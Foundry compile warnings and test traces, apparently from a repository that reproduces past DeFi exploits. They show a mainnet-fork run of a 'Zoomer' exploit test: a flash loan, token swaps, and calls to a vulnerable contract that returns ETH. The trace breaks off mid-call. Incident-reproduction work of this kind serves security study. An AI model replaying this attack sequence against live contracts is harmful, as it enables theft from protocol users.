Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.36s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/Zoomer_exp.sol:18:5:
   |
18 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/Zoomer_exp.sol:19:5:
   |
19 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/Zoomer_exp.sol:67:5:
   |
67 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-02/Zoomer_exp.sol:68:5:
   |
68 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-02/Zoomer_exp.sol:13:1:
   |
13 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-02/Zoomer_exp.sol:59:5:
   |
59 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-02/Zoomer_exp.sol:62:1:
   |
62 | contract Money is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-02/Zoomer_exp.sol:95:5:
   |
95 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-02/Zoomer_exp.sol:80:9:
   |
80 |         address(Vulncontract).call{value: 0.02 ether}(
   |         ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2024-02/Zoomer_exp.sol:84:9:
   |
84 |         (msg.sender).call{value: address(this).balance}("");
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/Zoomer_exp.sol:39:9:
   |
39 |         address[] memory tokens,
   |         ^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/Zoomer_exp.sol:40:9:
   |
40 |         uint256[] memory amounts,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/Zoomer_exp.sol:41:9:
   |
41 |         uint256[] memory feeAmounts,
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-02/Zoomer_exp.sol:42:9:
   |
42 |         bytes memory userData
   |         ^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 904.21ms (2.54ms CPU time)

Ran 1 test for src/test/2024-02/Zoomer_exp.sol:ContractTest
[PASS] testExploit() (gas: 11705242)
Logs:
  [Begin] Attacker ETH before exploit: 79228162514.264337593543950335
  [Begin] Attacker ETH after exploit: 79228161529.072816349105401162

Traces:
  [5830] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19291249 [1.929e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [12048542] ContractTest::testExploit()
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker ETH before exploit", val: 79228162514264337593543950335 [7.922e28], decimals: 18)
    ├─ [12031042] 0xBA12222222228d8Ba445958a75a0704d566BF2C8::flashLoan(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [200000000000000000000 [2e20]], 0x000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000ad78ebc5ac62000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000047465737400000000000000000000000000000000000000000000000000000000)
    │   ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xBA12222222228d8Ba445958a75a0704d566BF2C8) [staticcall]
    │   │   └─ ← [Return] 56381328404216832701034 [5.638e22]
    │   ├─ [2350] 0xce88686553686DA562CE7Cea497CE749DA109f9F::getFlashLoanFeePercentage() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   ├─ [27962] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 200000000000000000000 [2e20])
    │   │   ├─ emit Transfer(from: 0xBA12222222228d8Ba445958a75a0704d566BF2C8, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 200000000000000000000 [2e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000ad78ebc5ac6200000
    │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000bf0701ca68e01e1b26a → 0x000000000000000000000000000000000000000000000be5988dea333bc1b26a
    │   │   └─ ← [Return] true
    │   ├─ [11976547] ContractTest::receiveFlashLoan([0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], [200000000000000000000 [2e20]], [0], 0x000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e0000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000ad78ebc5ac62000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000047465737400000000000000000000000000000000000000000000000000000000)
    │   │   ├─ [2415066] → new Money@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   │   │   ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x71644a297965140ccc65170a36512e5e0ef3d403a734ada6519e5c3ef7b5ec35: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [152411] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactETHForTokens{value: 199900000000000000000}(0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676], Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 1708702883 [1.708e9])
    │   │   │   │   ├─ [2504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 4717775337301421443628459384 [4.717e27], 54868374254206930298 [5.486e19], 1708701575 [1.708e9]
    │   │   │   │   ├─ [23974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 199900000000000000000}()
    │   │   │   │   │   ├─ emit Deposit(dst: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x00000000000000000000000000000000000000000000000ad62b76e268960000
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [8062] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 199900000000000000000 [1.999e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x00000000000000000000000000000000000000000000000ad62b76e268960000 → 0
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x000000000000000000000000000000000000000000000002f9739fadd9314d7a → 0x00000000000000000000000000000000000000000000000dcf9f169041c74d7a
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [101106] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(3699330937676367317864095852 [3.699e27], 0, Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0x)
    │   │   │   │   │   ├─ [65797] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 3699330937676367317864095852 [3.699e27])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], value: 3699330937676367317864095852 [3.699e27])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0 → 0x00000000000000000000000000000000000000000bf403cbf7f4b6abf13d206c
    │   │   │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x00000000000000000000000000000000000000000f3e73c980026838992ce578 → 0x0000000000000000000000000000000000000000034a6ffd880db18ca7efc50c
    │   │   │   │   │   │   │   @ 14: 16350 → 16351
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 1018444399625054125764363532 [1.018e27]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 254768374254206930298 [2.547e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 1018444399625054125764363532 [1.018e27], reserve1: 254768374254206930298 [2.547e20])
    │   │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 199900000000000000000 [1.999e20], amount0Out: 3699330937676367317864095852 [3.699e27], amount1Out: 0, to: Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000002e24976684c169eaa8e9f8cb972c → 0x0000000000000000000000000000000000002e25969e80df8e2fc7c1d9d9f31c
    │   │   │   │   │   │   @ 10: 0x00000000000000000000000ae5833cbe355bdefda21475ae82849688e6ca9a88 → 0x00000000000000000000000ae59d6c43bb555896165eac3200f229a872d5db14
    │   │   │   │   │   │   @ 8: 0x65d8b787000000000002f9739fadd9314d7a00000f3e73c980026838992ce578 → 0x65d8bca300000000000dcf9f169041c74d7a0000034a6ffd880db18ca7efc50c
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return] [199900000000000000000 [1.999e20], 3699330937676367317864095852 [3.699e27]]
    │   │   │   ├─ [25266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ emit Approval(owner: Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x6d09544778cd904e4c23a25107d23116e59e8e07b4c18abe2ea9963fa19b11c3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [202896] 0x9700204D77A67A18eA8F1B47275897b21e5eFA97::72c4cff6{value: 20000000000000000}(0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b76760000000000000000000000000000000000000000001908f29f1e5e61dde00000)
    │   │   │   │   ├─ [18930] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Transfer(from: Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 30265400000000000000000000 [3.026e25])
    │   │   │   │   │   ├─ emit Approval(owner: Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], spender: 0x9700204D77A67A18eA8F1B47275897b21e5eFA97, value: 115792089237316195423570985008687907853269984665640533774057584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6d09544778cd904e4c23a25107d23116e59e8e07b4c18abe2ea9963fa19b11c3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffe6f70d60e1a19e221fffff
    │   │   │   │   │   │   @ 0xf2f990490f98f333693ac7d75623d20de79f35ab79b3d154d003025f90e2b764: 0x000000000000000000000000000000000000000000b65373c2cba20800000000 → 0x000000000000000000000000000000000000000000cf5c6661ea0069dde00000
    │   │   │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0x00000000000000000000000000000000000000000bf403cbf7f4b6abf13d206c → 0x00000000000000000000000000000000000000000bdafad958d6584a135d206c
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2564] 0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f::getPair(0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72
    │   │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 1018444399625054125764363532 [1.018e27], 254768374254206930298 [2.547e20], 1708702883 [1.708e9]
    │   │   │   │   ├─ [381] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::token0() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676
    │   │   │   │   ├─ [0] Money::fallback{value: 3596236288963049246}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 2: 9 → 10
    │   │   │   │   │   @ 0x03e4c9e74b1c7b5bc291bbceddb1959bc654bc89eb9c1f11f6da9a1eeb9b4077: 0 → 0x0000000000000000000000000000000000000000000000000000000065e5eba3
    │   │   │   │   │   @ 0x03e4c9e74b1c7b5bc291bbceddb1959bc654bc89eb9c1f11f6da9a1eeb9b4074: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   │   │   @ 0x03e4c9e74b1c7b5bc291bbceddb1959bc654bc89eb9c1f11f6da9a1eeb9b4076: 0 → 0x0000000000000000000000000000000000000000000000003488d7004e53f6a7
    │   │   │   │   │   @ 0x03e4c9e74b1c7b5bc291bbceddb1959bc654bc89eb9c1f11f6da9a1eeb9b4078: 0 → 0x0000000000000000000000000000000000000000000000000000000065d8bca3
    │   │   │   │   │   @ 0x405787fa12a823e0f2b7631cc41b3ba8828b3321ca811111fa75cd3aa3bb5ad7: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   │   │   @ 0x03e4c9e74b1c7b5bc291bbceddb1959bc654bc89eb9c1f11f6da9a1eeb9b4075: 0 → 0x0000000000000000000000000000000000000000001908f29f1e5e61dde00000
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f]) [staticcall]
    │   │   │   │   └─ ← [Return] 3669065537676367317864095852 [3.669e27]
    │   │   │   ├─ [32771] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3669065537676367317864095852 [3.669e27])
    │   │   │   │   ├─ emit Transfer(from: Money: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3669065537676367317864095852 [3.669e27])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xe135b438163c07f06263f9c7a911682b41bdc632d00c89620a1db653a7041b6a: 0x00000000000000000000000000000000000000000bdafad958d6584a135d206c → 0
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000bdafad958d6584a135d206c
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [41] ContractTest::fallback{value: 3676236288963049246}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 36: 0 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   │   │   │   @ 33: 0 → 0x0000000000000000000000000d505c03d30e65f6e9b4ef88855a47a89e4b7676
    │   │   │   │   @ 12: 0 → 1
    │   │   │   │   @ 32: 0 → 0x0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
    │   │   │   │   @ 34: 0 → 0x0000000000000000000000009700204d77a67a18ea8f1b47275897b21e5efa97
    │   │   │   │   @ 31: 0 → 0x00000000000000000000007109709ecfa91a80626ff3989d68f67f5b1dd12d01
    │   │   │   │   @ 35: 0 → 0x00000000000000000000000055d398326f99059ff775485246999027b3197955
    │   │   │   │   @ 0x6d09544778cd904e4c23a25107d23116e59e8e07b4c18abe2ea9963fa19b11c3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 0x71644a297965140ccc65170a36512e5e0ef3d403a734ada6519e5c3ef7b5ec35: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   @ 0: 2 → 1
    │   │   │   │   @ 37: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   └─ ← [Return] 8811 bytes of code
    │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3669065537676367317864095852 [3.669e27]
    │   │   ├─ [25266] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [44847] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokens(3669065537676367317864095852 [3.669e27], 0, [0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1708703003 [1.708e9])
    │   │   │   ├─ [504] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 1018444399625054125764363532 [1.018e27], 254768374254206930298 [2.547e20], 1708702883 [1.708e9]
    │   │   │   ├─ [19739] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, 3669065537676367317864095852 [3.669e27])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, value: 3669065537676367317864095852 [3.669e27])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 115792089237316195423570985008687907853269984665636894973919907640595265544083 [1.157e77])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000bdafad958d6584a135d206c → 0
    │   │   │   │   │   @ 0xbda5c3b0e636d87e9689db6e66a16c5dea6d4bc5a1a7a9f0e242006b64cce914: 0x0000000000000000000000000000000000000000034a6ffd880db18ca7efc50c → 0x00000000000000000000000000000000000000000f256ad6e0e409d6bb4ce578
    │   │   │   │   │   @ 0x26de9a43e7704b60d31f71cc330b4d43a0db9dad71c363e2fbd9119e9db294b7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffff4250526a729a7b5eca2df93
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [16855] 0xC2C701110dE2b9503E98619d9c9e3017877b0f72::swap(0, 199285155629473984883 [1.992e20], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 199285155629473984883 [1.992e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0xC2C701110dE2b9503E98619d9c9e3017877b0f72, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 199285155629473984883 [1.992e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000ad78ebc5ac6200000 → 0x000000000000000000000000000000000000000000000015a531d58aa55bf173
    │   │   │   │   │   │   @ 0x7bef77c31785d26b528aabfd5085ccf57f954814dd85cc8f2e0ddaf5453e36c1: 0x00000000000000000000000000000000000000000000000dcf9f169041c74d7a → 0x00000000000000000000000000000000000000000000000301fbfd60628b5c07
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [952] 0x0D505C03d30e65f6e9b4Ef88855a47a89e4b7676::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 4687509937301421443628459384 [4.687e27]
    │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0xC2C701110dE2b9503E98619d9c9e3017877b0f72) [staticcall]
    │   │   │   │   │   └─ ← [Return] 55483218624732945415 [5.548e19]
    │   │   │   │   ├─ emit Sync(reserve0: 4687509937301421443628459384 [4.687e27], reserve1: 55483218624732945415 [5.548e19])
    │   │   │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 3669065537676367317864095852 [3.669e27], amount1In: 0, amount0Out: 0, amount1Out: 199285155629473984883 [1.992e20], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x65d8bca300000000000dcf9f169041c74d7a0000034a6ffd880db18ca7efc50c → 0x65d8bca300000000000301fbfd60628b5c0700000f256ad6e0e409d6bb4ce578
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [3669065537676367317864095852 [3.669e27], 199285155629473984883 [1.992e20]]
    │   │   ├─ [2305350] → new Money@0x2e234DAe75C793f67A35089C9d99245E1C58470b
